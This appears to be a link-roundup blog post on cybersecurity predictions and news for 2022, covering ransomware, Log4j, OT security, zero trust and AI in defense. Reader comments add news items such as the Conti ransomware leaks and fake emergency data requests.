Nothing is more difficult than making predictions. Instead of trowing out wild ideas what might be coming, I have collected here some trends other people have predicted or reported.
Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.
Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threatit’s a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks; cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research development and investments. Advanced 5G and wireless networks will benefit higher traffic capacities, lower latency, increased reliability, and enable processing and analytics in real-time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated by searching for vulnerabilities and infiltrating malware by adapting (and automating), enabling machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.
Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original Log4j vulnerability (CVE-2021-44228) and newer findings on the same software (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105, CVE-2021-42550).
Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.
Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has
emerged: employee burnout.
In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Its real trouble isn’t so much with open-source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product, ” points out constant vigilance is needed to secure all software.
The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development; operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.
Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
we’ve covered five main topics: 1 Malware, 2 Mobile, 3 Machine Learning and AI, 4 Ransomware (because we simply couldn’t not give it a section of its own), and 5 Where next?. PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
There are some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities
• AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence reports (CTI). Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect more rapidly cyber threats.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.
Kännyköiden tietoturva menee uusiksi
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has been in place for more than a decade, with trusted processing performed in the TEE (Trusted Execution Environment) section of device memory. The current standard solution for smartphone security is typically created with Arm’s TrustZone technology. The phone’s own security comes from TEE. A secure boot usually includes a TEE. TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed 15 years ago).
The memory required by the TEE has not been available in the small controller chips used for embedded applications. Manufacturers have promoted Safe Boot and Memory Encryption or Flash Encryption, but they have been pretty weak solutions. Recently, Arm’s TrustZone M has introduced a new security model for controllers.
In recent years, this picture has begun to diversify. A revolution is underway now. Google has launched a keystone technology that allows an application to generate a system-maintained key and authenticate services (still uses TEE).
In the future, for example, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s HSSL laboratory (Helsinki System Security Lab). Five years ago, Intel introduced SGX technology for PC servers, which simply means security extension commands added to the CPU chip. In this solution, TEE type protections are provided by a secure enclave. The use of this type of security enclave needs less code than traditional TEE structure. An enclave is a temporary structure in the memory of a device. It is created only for security processes and exits when it has completed its task. The difference is significant in the TEE structure, where another kernel runs all the time alongside the operating system. When there is no other parallel kernel, there is one component less to attack.
In Intel’s SGX, enclaves were implemented through caching, which limited their use. Intel has sought to overcome this limitation with newer TDX (Trust Domain Extensions) technology. AMD aims to do the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style solution structure will also come in the smart phones. The new Armv9-A architecture last year offers a realm mode that is very close to the technologies offered on the server side (Intel SGX). With the coming enclaves, an infinite number of secured environments will be available in principle.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.
Kyberhyökkäykset uhkaavat jo tavarantoimituksiakin
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime from technically savvy individuals and criminal organizations to all. The new “Everything as a Service” service model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf
Jarno Limnéll varoittaa “kyberpandemiasta” internetin häiriö voi panna maailman taas sekaisin
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are scams. And scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in the direction that technology is evolving faster and faster, and rather increasing the possibility of various disruptions and creating new types of vulnerabilities. There is no seamless security,” Limnagl says. So even with technology, the world will not be completed. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”
Kyberhyökkäykset kiihtyvät, mutta yritykset voivat vastata niihin
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
Cyber attacks are accelerating, but companies can respond to them A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack area of companies and organizations has grown exponentially. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those are:
• Enhanced server security and application management policies to combat blackmail
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Advanced Detection and Response (XDR) model to detect attacks on large networks
Trend Micron raportti: tulevaisuudessa kaikki on vaarassa
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.
3,062 Comments
Tomi Engdahl says:
Ransomware Enforcement Operations in 2020 and 2021 https://www.recordedfuture.com/ransomware-enforcement-operations-in-2020-and-2021/
This report looks at international law enforcement operations and is based on data collected over the last 2 years. We first address common difficulties faced by law enforcement, then outline trends and observations by distinguishing between different types of law enforcement activities, and finally provide a timeline of all events.
Through this report, we aim to create an overview of the status quo and to better understand the effectiveness of law enforcement in the medium term.
Tomi Engdahl says:
Toimialojen kyberkypsyyttä selvitetään jälleen https://www.huoltovarmuuskeskus.fi/a/toimialojen-kyberkypsyytta-selvitetaan-jalleen
Ymmärrystä yrityskentän kyberkypsyydestä kerätään fasilitoituna selvitysprojektina Huoltovarmuusorganisaation Digipoolin toimesta.
Selvitystyössä hyödynnetään Kyberturvallisuuskeskuksessa valmisteltua kansallista arviointimallia Kybermittaria, jota käyttäen haastatellaan yli 120 eri toimialoja edustavaa yritystä.
Tomi Engdahl says:
The Importance of Open Source to an XDR Architecture
https://www.securityweek.com/importance-open-source-xdr-architecture
No longer satisfied with infecting files or systems, adversaries are now intent on crippling entire enterprises. Damaging supply chain, ransomware and wiper attacks are making headline news, impacting not only the organization but their stakeholders too. As threat actors’ approaches and targets change, our approach to detection and response is changing as well.
Extended Detection and Response (XDR) is now widely considered to be the most effective path forward to enable detection and response across the infrastructure, across all attack vectors, across different vendors, and across security technologies that are cloud based and on premises. Delivering on this promise requires ALL tools and ALL teams working in concert, so the “X factor” in an XDR architecture is integration. And this integration must be broad and deep so that organizations can get the most value out of their existing best-of-breed security solutions, including their free, open source tools.
Myriad open source threat feeds and intelligence sources provide important information and preventative measures for defending against existing and emerging threats. Additionally, MISP is a great source for information sharing. The MITRE ATT&CK extensive knowledgebase helps teams more deeply understand adversary campaigns and risk mitigations based on real-world observations. And connecting with TheHive accelerates incident response, which is the priority for many organizations. Individually, these tools offer tremendous benefits. But when you integrate them as part of an overall XDR architecture, their benefits are magnified in three ways.
1. Enrich events with critical data about the latest threats. Detection now requires a breadth and depth of information from disparate systems and sources brought into a single view, so you can gain a comprehensive understanding of the threat you are facing and know what you must defend.
2. Capture more value from existing teams and tools. Bi-directional integration ensures that data flows between teams and tools as part of existing workflows. With a software development kit (SDK) and easy-to-use APIs, integration with existing tools, including MISP and TheHive, is fast. When the right data can get to the right systems and teams at the right time, data utilization improves and teams are more efficient and effective because they are able to share actionable intelligence using tools they know and trust.
3. Take the right actions faster. Multiple systems are now involved in attacks, so response requires the capability to look beyond one file or system to find all related events and data across the organization. Connecting the dots and contextualizing with additional intelligence accelerates remediation and response to an incident across the infrastructure. MITRE ATT&CK plays a central role in helping teams expand their search for artifacts associated with a campaign within their environment, test hypotheses to confirm or disprove findings, and make decisions quickly about response and remediation. TheHive can support incident response, but you can also integrate with an ecosystem of tools to support a variety of use cases including spear phishing, threat hunting, alert triage and vulnerability management. With a deeper understanding of what is happening across your environment and integration across different tool sets, you can send associated data back to the right tools across your defensive grid immediately and automatically to take the right actions faster.
Many organizations first turn to open-source tools because they are free. Today, these tools have earned a loyal following as result of the tremendous value they deliver, and teams will continue to rely on them as an essential part of their security toolkit for decades to come. Now, as part of an XDR architecture where integration is broad and deep, there is an opportunity to elevate open source tools even further because, as ESG’s Jon Oltsik has said, “XDR assumes the whole is even greater than the sum of its parts.” Open source tools are an important part.
Tomi Engdahl says:
The Need for Resilient Zero Trust
https://www.securityweek.com/need-resilient-zero-trust
It is essential to ensure that any Zero Trust technology used is resilient to external factors
The growing threat of cyberattacks like SolarWinds, JBS USA, and Colonial Pipeline has underscored that organizations can no longer depend on conventional perimeter-based defenses to protect critical systems and data. The Log4j vulnerability is the latest sign that organizations must assume that cyber adversaries are already in their network. Against the backdrop of these high-profile incidents and growing concerns of retaliatory cyberattacks by Russia following its invasion of Ukraine, legislators have stepped up their efforts to bolster resilience and response capabilities against these threats (e.g., U.S. Cyber Incident Reporting for Critical Infrastructure Act, European Union Rules for Common Cybersecurity and Information Security Measures).
New regulations are aimed at shifting the cybersecurity paradigm – away from the old mantra of “trust but verify” and instead toward a Zero Trust approach, whereby access to applications and data is denied by default. Threat prevention is achieved by only granting access to networks and workloads utilizing policy informed by continuous, contextual, risk-based verification across users and their associated devices.
Tomi Engdahl says:
Bradley Chambers / 9to5Mac:
Apple Business Essentials launches for all SMBs in the US, starting at $2.99/month; the management service is getting Google Workspace integration in the spring — After a beta period with tens of thousands of businesses, Apple is ready to extend simplified device management, iCloud Drive storage …
Apple Business Essentials is now available to all small businesses in the US, Google Workspace integration coming this spring
https://9to5mac.com/2022/03/31/apple-business-essentials-is-now-available/
Tomi Engdahl says:
Jack Schickler / CoinDesk:
The EU Parliament votes to outlaw anonymous crypto payments, extending KYC rules to even the smallest transactions with unhosted or self-hosted wallets — Lawmakers are set to end even the smallest anonymous crypto transactions, and plan measures that could see unregulated exchanges cut off.
EU Parliament Passes Privacy-Busting Crypto Rules Despite Industry Criticism
https://www.coindesk.com/policy/2022/03/31/eu-parliament-votes-on-privacy-busting-crypto-rules-industry-rails-against-proposals/
Lawmakers are set to end even the smallest anonymous crypto transactions, and plan measures that could see unregulated exchanges cut off.
European Union lawmakers voted today in favor of controversial measures to outlaw anonymous crypto transactions, a move the industry said would stifle innovation and invade privacy.
More than 90 lawmakers voted in favor of the proposal, according to documents seen by CoinDesk.
The proposals are intended to extend anti-money laundering (AML) requirements that apply to conventional payments over EUR 1,000 ($1,114) to the crypto sector. They also scrap the floor for crypto payments, so payers and recipients of even the smallest crypto transactions would need to be identified, including for transactions with unhosted or self-hosted wallets. Further measures under discussion could see unregulated crypto exchanges cut off from the conventional financial system.
National governments said in December they wanted to scrap the EUR 1,000 threshold for crypto, on the basis that digital payments can easily circumvent the limit, and to include private wallets that aren’t operated by regulated crypto asset providers.
Members of the center-right European People’s Party (EPP) opposed many of the more controversial changes, condemning what they called a “de facto ban of self-hosted wallets.”
“Such proposals are neither warranted nor proportionate,” said EPP economic spokesperson, Markus Ferber, in an emailed statement Thursday. “With this approach of regulating new technologies, the European Union will fall further behind other, more open-minded jurisdictions.”
A separate legal proposal also discussed today would stop transfers being made to “non-compliant” crypto service providers, which includes those operating in the EU without authorization or that are not affiliated to or established in any jurisdiction.
The Thursday vote came in spite of objections from major industry participants, such as Coinbase, and from legal experts who warned that overly heavy handed privacy violations could face legal challenges in EU courts.
Under the new rules, Coinbase would have to report to the authorities any time a customer received over EUR 1,000 of crypto from a self-hosted wallet, the exchange’s CEO Brian Armstrong warned in a tweet posted Wednesday.
Tomi Engdahl says:
Sean Lyngaas / CNN:
Interview with pseudonymous Ukrainian IT specialist Danylo, who released chat logs from the Russia-linked Conti ransomware gang, on his motivations and more
‘I can fight with a keyboard’: How one Ukrainian IT specialist exposed a notorious Russian ransomware gang
By Sean Lyngaas, CNN
https://edition.cnn.com/2022/03/30/politics/ukraine-hack-russian-ransomware-gang/
Washington (CNN)As Russian artillery began raining down on his homeland last month, one Ukrainian computer researcher decided to fight back the best way he knew how — by sabotaging one of the most formidable ransomware gangs in Russia.
Four days into Russia’s invasion, the researcher began publishing the biggest leak ever of files and data from Conti, a syndicate of Russian and Eastern Europe cybercriminals wanted by the FBI for conducting attacks on hundreds of US organizations and causing millions of dollars in losses.
The thousands of internal documents and communications include evidence that appears to suggest Conti operatives have contacts within the Russian government, including the FSB intelligence service. That supports a longstanding US allegation that Moscow has colluded with cybercriminals for strategic advantage.
The Ukrainian computer specialist behind the leak spoke exclusively to CNN and described his motivation for seeking revenge after Conti operatives published a statement in support of the Russian government immediately after the invasion of Ukraine. He also described his desperate efforts to track down loved ones in Ukraine in recent weeks.
To protect his identity, CNN agreed to refer to him by a pseudonym: Danylo.
“I cannot shoot anything, but I can fight with a keyboard and mouse,” Danylo told CNN.
The trove of data Danylo leaked in late February illustrates why cybersecurity has been such a fraught issue in US-Russia relations. It includes cryptocurrency accounts the Conti hackers used to allegedly reap millions of dollars in ransom payments, their discussions of how to extort US companies and their apparent targeting of a journalist investigating the poisoning of Kremlin critic Alexey Navalny.
But it also shows how hard it can be to disable ransomware operations. Despite Danylo unmasking their operations, the hackers continue to announce new victim organizations.
Danylo, who has worked as a cybersecurity researcher for years and studied the underground cybercriminal economy in Europe, is just one vigilante in a shadow war that has emerged between hackers and cybersecurity executives who have pledged support for the Ukrainian and Russian governments as the biggest land war in Europe since World War II drags on.
But by disrupting a group as notorious as Conti, Danylo has gained more attention than others. The FBI, Danylo said, contacted him after he began to leak the Conti files, asking him to stop leaking.
CNN corroborated Danylo’s claim that he was the leaker by reviewing evidence that he had access to the Twitter account that was publishing the Conti data, as well as a website that Danylo and another person, who was granted anonymity for their protection, were using to share data contained in the leaks.
Digital retribution
Danylo claims that he first gained access to computer systems used by what would become the Conti syndicate in 2016. Though he declined to explain in detail how he did this, independent security experts have verified to CNN the dataset belongs to the hackers. (Conti is both the name of malicious software and the cybercriminal syndicate that uses it. The group is also affiliated with TrickBot, another hacking tool used in numerous ransomware attacks.)
“Sometimes they make mistakes,” Danylo said, referring to ransomware groups. “You need to catch them when they make a mistake. I just was in the right place at the right time. I was monitoring them.”
For years, Danylo said, he quietly lurked on the hackers’ computer servers and would pass along information on the group’s operations to European law enforcement officials.
Conti ransomware has been rampant in the last two years, with the hackers claiming numerous victims a week.
The dark work was lucrative: hackers using the Conti ransomware received at least $25.5 million in ransom payments in the span of just four months in 2021, according to Elliptic, a firm that tracks cryptocurrency transactions.
But something snapped in Danylo on February 25, 2022, when Conti operatives published a statement pledging their “full support” for the Russian government as it attacked Ukraine.
A Russian airstrike had landed not far from a family member’s house. The cybersecurity researcher grew up in Ukraine when it was part of the Soviet Union. He didn’t want to see it slip back into Russian hands.
Conti members tried to walk their statement back, claiming they weren’t supporting any government, but Danylo had heard enough.
Asked again why he dumped the Conti data, Danylo said with a laugh: “To prove that they are motherf**kers.” He was exhausted from a long day navigating military checkpoints in Ukraine, on the hunt for cigarettes and looking to the sky for signs of the next air raid.
Contacted by the FBI
Conti is exactly the type of prolific ransomware group that President Joe Biden last year exhorted Russian President Vladimir Putin to bring to heel amid a spate of attacks on US critical infrastructure.
After he started leaking the data, Danylo said, an FBI special agent contacted him and asked him to stop. Exposing Conti infrastructure could, in theory, make it more difficult for the FBI to track the group because it might set up new computer systems.
Danylo has stopped leaking for now. But he says he still has access to some Conti computer systems.
At least one law enforcement official who spoke to CNN would have preferred that Danylo had maintained that covert access, rather than alert the ransomware syndicate to his presence by leaking the data.
“Publicly releasing information like [the leaker did] is reckless,” a US law enforcement official told CNN. “Working cooperatively with law enforcement can achieve a more substantial and lasting impact in disrupting the operations of groups like Conti.”
But John Fokker, a former cybercrime investigator with the Dutch police, said the leak could actually be useful to cops chasing cyber crooks.
“Yes, infrastructure can be burned. However, the amount of data provided in the leaks make me confident that law enforcement got the information they need to write indictments on key individuals,” said Fokker, who works closely with European law enforcement as head of cyber investigations at security firm Trellix.
A catalog of misdeeds
The Conti leaks are a startling catalog of the alleged misdeeds of a multimillion-dollar criminal enterprise.
CNN evaluated and translated the original cache of documents that Danylo shared with the world via Twitter.
The communications show Conti members, each going by aliases in the chat logs, discussing the wisdom of extorting US small businesses, seemingly refraining from hacking Russian targets, and taking an interest in a journalist writing about Navalny, the Russian opposition figure who has been jailed and poisoned.
Conti operatives refer in their chats to Liteyny Avenue in St. Petersburg, which happens to be home to local FSB offices, according to Kimberly Goody, director of cyber crime analysis at security firm Mandiant.
“Generally speaking, it would be relatively unsurprising to learn that an operation as extensive as this would not in some way be leveraged as an asset [by the Russian government] at a point in time,” Goody told CNN.
‘It’s my work’
Cyberattacks have played a supporting role in the war in Ukraine. The White House has accused the Russian GRU military intelligence agency of knocking key Ukrainian government websites offline prior to the invasion. (A charge the Kremlin denies.) US officials are also investigating a hack of a satellite network serving parts of Ukraine, which occurred as the Russian invasion began, as a potential Russian state-sponsored hack, CNN previously reported.
For its part, the Ukrainian government has encouraged an “IT army” of volunteer hackers in Ukraine and abroad to conduct cyberattacks on Russian organizations.
In the free-for-all that is Ukrainian cyberspace, combatants like Danylo engage on their own terms.
After weeks of living the war, Danylo told CNN he slipped safely out of Ukraine with his laptop this week.
Tomi Engdahl says:
Hackers Gaining Power of Subpoena Via Fake “Emergency Data Requests”
https://krebsonsecurity.com/2022/03/hackers-gaining-power-of-subpoena-via-fake-emergency-data-requests/
There is a terrifying and highly effective “method” that criminal hackers are now using to harvest sensitive customer data from Internet service providers, phone companies and social media firms. It involves compromising email accounts and websites tied to police departments and government agencies, and then sending unauthorized demands for subscriber data while claiming the information being requested can’t wait for a court order because it relates to an urgent matter of life and death.
Tomi Engdahl says:
The Semiconductor Security War
https://www.youtube.com/watch?v=8G39EK4qyrk
Modern chips own your life. For instance, take the A15 SOC that is sitting inside your iPhone. Inside that chip are multiple security assets of high corporate value: encryption keys, developer keys, DRM keys, and so on.
Furthermore, imagine how much of your life’s business is conducted through your mobile phone. For instance, my phone has my biometric information, my bank access information, passwords to all my services, and so on.
Software security protections are frequently implemented with the tenet that “trust starts in silicon”. But a house cannot be built on soft sand. Likewise, a secure system cannot be architectured on top of compromised hardware.
In this video, I want to talk about the daunting problem of maintaining security in today’s modern semiconductors.
Tomi Engdahl says:
Suzanne Smalley / CyberScoop:
Sources: Biden administration considers changing a Trump-era policy which let DoD and Cyber Command authorize cyber operations without White House approval — The Biden administration is reviewing whether and how to change a Trump-era policy which gave unprecedented authority to the Department …
https://www.cyberscoop.com/biden-trump-nspm-13-presidential-memo-cyber-command-white-house/
Tomi Engdahl says:
We don’t trust you. We don’t trust anyone. You have your agenda and we have ours. Safe is better than new, shiny, and sexy. That’s it. We carry the burden of the company, you carry the burden of your group. Our agenda just trumps yours. We are nimble and change with the landscape. You want to run insecure versions of Visual Studio and download programs from fuckyourenviroment.com. We are different.
Tomi Engdahl says:
Hyvä pointti: Järjestäytyneen rikollisuuden liikevaihto 110 miljardia euroa vuodessa EU-alueella.
https://polamk.fi/-/tutkimus-jarjestaytyneen-rikollisuuden-liikevaihto-110-miljardia-euroa-vuodessa-eu-alueella
Tomi Engdahl says:
Venäjä voi häiritä Suomen Nato-keskustelua iskemällä arkaan paikkaan https://www.is.fi/digitoday/art-2000008719816.html
VENÄJÄN odotetaan kohdistavan lähikuukausien aikana Suomeen kyber- ja informaatiovaikuttamista. Suojelupoliisi kertoi tiistaina pitämässään tiedotustilaisuudessa pitävänsä todennäköisenä, että etenkin Suomessa käytävään Nato-keskusteluun pyritään vaikuttamaan. Tekniikan tohtori ja kyberturvallisuuden asiantuntija Catharina Candolin uskoo Nato-keskustelussa kuultavan virheellistä ja negatiivista tietoa.
Tomi Engdahl says:
Kaksivaiheinen tunnistautuminen on ehdottomasti hyvä asia, mutta heikosti toteutettuna sekin voidaan kiertää https://www.tivi.fi/uutiset/tv/fd6faa84-5d3f-40c9-a630-7e4e91fd79ba
